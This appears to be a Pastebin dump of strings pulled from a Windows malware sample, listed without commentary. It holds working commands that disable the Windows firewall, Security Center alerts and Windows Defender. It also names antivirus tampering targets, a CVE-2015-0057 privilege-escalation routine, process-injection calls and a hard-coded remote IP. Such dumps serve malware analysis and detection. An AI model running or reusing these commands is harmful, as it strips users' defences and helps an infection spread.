API tools faq
paste
Advertisement
Matthewm

Some strings

Matthewm
May 26th, 2015
597
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.58 KB | None | 0 0
raw download clone embed print report
  1. open
  2. AppDataDir
  3. SOFTWARE\ESET\ESET Security\CurrentVersion\Info
  4. Sorry but i cannot find any installed ESET product :(
  5. \updfiles
  6. \lastupd.ver
  7. \upd.ver
  8. cmd.exe /c rmdir /S /Q "%s"
  9. cmd.exe /c md "%s"
  10. cmd.exe /c attrib +R +S +H /D /S "%s"
  11. cmd.exe /c md "%s"
  12. cmd.exe /c attrib +R +S +H /D /S "%s"
  13. cmd.exe /c md "%s"
  14. cmd.exe /c attrib +R +S +H /D /S "%s"
  15. Local AppData
  16. SYSTEM\CurrentControlSet\services\Avg\SystemValues
  17. Sorry but i cannot find any installed AVG product :(
  18. \Avg2015\
  19. \Avg2014\
  20. \Avg2013\
  21. \Avg2012\
  22. \Avg2011\
  23. update
  24. cmd.exe /c rmdir /S /Q "%s"
  25. \download
  26. AppDataDirectory
  27. SOFTWARE\Avira\Antivir Desktop
  28. Sorry but i cannot find any installed Avira product :(
  29. Path
  30. SOFTWARE\Avira\Antivir Desktop
  31. Sorry but i cannot find any installed Avira product :(
  32. \TEMP\avwin.ini
  33. avconfig.exe" /SAVEAVWININI="avwin.ini;"
  34. ALLUSERSPROFILE
  35. \Malwarebytes\Malwarebytes Anti-Malware\
  36. ProgramData
  37. \Malwarebytes\Malwarebytes Anti-Malware\
  38. exclusions.dat
  39. Configuration\settings.conf
  40. Configuration\scheduler.conf
  41. exclusions.dat
  42. Configuration\settings.conf
  43. Configuration\scheduler.conf
  44. ProductPath
  45. SYSTEM\CurrentControlSet\services\MBAMProtector\Parameters
  46. C:\Program Files\Malwarebytes Anti-Malware
  47. \mbam.dll
  48. ProtectionStop
  49. SchedulerStop
  50. SelfProtectionDisable
  51. mbam.exe
  52. reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v EnableFirewall /t reg_dword /d 0 /f
  53. reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v EnableFirewall /t reg_dword /d 0 /f
  54. net stop MpsSvc
  55. net stop WinDefend
  56. reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
  57. kernel32
  58. reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
  59. IsWow64Process
  60. GetSystemWow64DirectoryA
  61. reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DisableNotifications /t reg_dword /d 1 /f
  62. kernel32
  63. reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DisableNotifications /t reg_dword /d 1 /f
  64. GetNativeSystemInfo
  65. reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v EnableFirewall /t reg_dword /d 0 /f
  66. reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DoNotAllowExceptions /t reg_dword /d 0 /f
  67. kereruthjertr456
  68. reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DisableNotifications /t reg_dword /d 1 /f
  69. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  70. mbam.exe
  71. reg add HKLM\system\currentcontrolset\Services\SharedAccess /v Start /t reg_dword /d 4 /f
  72. WinNtM
  73. reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t reg_dword /d 1 /f
  74. reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusOverride /t reg_dword /d 1 /f
  75. WinNtM
  76. ekrn.exe
  77. reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallDisableNotify /t reg_dword /d 1 /f
  78. reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallOverride /t reg_dword /d 1 /f
  79. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  80. WinNtE
  81. reg add HKLM\SOFTWARE\Microsoft\Security Center /v UpdatesDisableNotify /t reg_dword /d 1 /f
  82. kernel32.dll
  83. WinNtE
  84. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  85. avgui.exe
  86. WinNtAv
  87. WinNtAv
  88. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  89. avgnt.exe
  90. WinNtAr
  91. WinNtAr
  92. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  93. kereruthjertr456
  94. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  95. kereruthjertr456
  96. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  97. pwned!
  98. not pwnd!
  99. SecureZonesTestUpgrade
  100. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  101. SecureZonesTestUpgrade
  102. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  103. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  104. SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  105. HalDispatchTable
  106. ntdll.dll
  107. NtQueryIntervalProfile
  108. NtAllocateVirtualMemory
  109. NtQuerySystemInformation
  110. NtFreeVirtualMemory
  111. HalDispatchTable
  112. PsInitialSystemProcess
  113. PsReferencePrimaryToken
  114. PsLookupProcessByProcessId
  115. HalDispatchTable
  116. $$$Secure UAP
  117. \setup.exe
  118. runas
  119. /C "copy "
  120. " "
  121. " /Y && "
  122. " "
  123. cmd.exe
  124. SOFTWARE\Microsoft\Updates\Windows XP\SP0
  125. SOFTWARE\Microsoft\Updates\Windows XP\SP10
  126. SOFTWARE\Microsoft\Updates\Windows XP\SP3
  127. SOFTWARE\Microsoft\Updates\Windows XP\SP4
  128. #32770
  129. SeDebugPrivilege
  130. SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
  131. .exe
  132. :Zone.Identifier
  133. FILE1
  134. RunYourMalwareHere
  135. RunYourMalwareHereWithHighIntegrityLevel
  136. GetNativeSystemInfo
  137. kernel32.dll
  138. KB2850851
  139. KB2850851
  140. GetNativeSystemInfo
  141. kernel32.dll
  142. GetNativeSystemInfo
  143. kernel32.dll
  144. error running file x64
  145. svchost.exe
  146. FAILED get win version
  147. Failed NtQuerySystemInformation
  148. Failed small_buffer
  149. Failed NtQuerySystemInformation2
  150. exe
  151. ntdll.dll
  152. Failed hntdll
  153. ZwQuerySystemInformation
  154. Failed pZwQuerySystemInformation
  155. ZwAllocateVirtualMemory
  156. Failed pZwAllocateVirtualMemory
  157. Failed sub_40101A
  158. PsLookupProcessByProcessId
  159. user32.dll
  160. AnimateWindow
  161. CreateSystemThreads
  162. Failed FindAnimateWindow_Call
  163. Failed pZwAllocateVirtualMemory
  164. Failed pZwAllocateVirtualMemory2
  165. gwgOTIwghththueryjret
  166. user32.dll
  167. GetNativeSystemInfo
  168. kernel32.dll
  169. checkarea
  170. checkarea
  171. checkarea
  172. checkarea
  173. ntdll.dll
  174. NtQuerySystemInformation
  175. PsLookupProcessByProcessId
  176. PsReferencePrimaryToken
  177. HalDispatchTable
  178. ntdll.dll
  179. NtQueryIntervalProfile
  180. STATIC
  181. MainWClass
  182. MainWClass
  183. STATIC
  184. SCROLLBAR
  185. testbox
  186. testbox
  187. testbox
  188. testbox1
  189. testbox2
  190. testbox3
  191. testbox1
  192. testbox2
  193. testbox3
  194. testbox1
  195. testbox2
  196. testbox3
  197. cItems
  198. cItems
  199. 3036220
  200. not admin. trying to exploit...
  201. success exploited CVE_2015_0057!
  202. 3036220
  203. not admin. trying to exploit...
  204. success exploited!
  205. medium or low IL, trying to elevate to SYSTEM
  206. find and replace path
  207. explorer.exe
  208. FlattenPath
  209. gdi32.dll
  210. SetWindowLongA
  211. user32.dll
  212. CreateWindowExA
  213. user32.dll
  214. StrStrIA
  215. shlwapi.dll
  216. strlen
  217. ntdll.dll
  218. DeleteDC
  219. gdi32.dll
  220. CreateCompatibleDC
  221. gdi32.dll
  222. not admin
  223. not admin
  224. admin
  225. do Inject
  226. IL > 0
  227. TULS11
  228. 93.185.4.90
  229. GET
  230. Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 OPR/28.0.1750.48
  231. LdrLoadDll
  232. LdrUnloadDll
  233. LdrEnumerateLoadedModules
  234. RtlInitUnicodeString
  235. RtlEqualUnicodeString
  236. RtlAddVectoredExceptionHandler
  237. RtlRemoveVectoredExceptionHandler
  238. RtlPushFrame
  239. RtlPopFrame
  240. RtlGetFrame
  241. ZwProtectVirtualMemory
  242. ZwUnmapViewOfSection
  243. ZwSetContextThread
  244. wcsrchr
  245. wcscmp
  246. memset
  247. memcpy
  248. VirtualFree
  249. ZwMapViewOfSection
  250. kernel32
  251. wmploc.dll
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!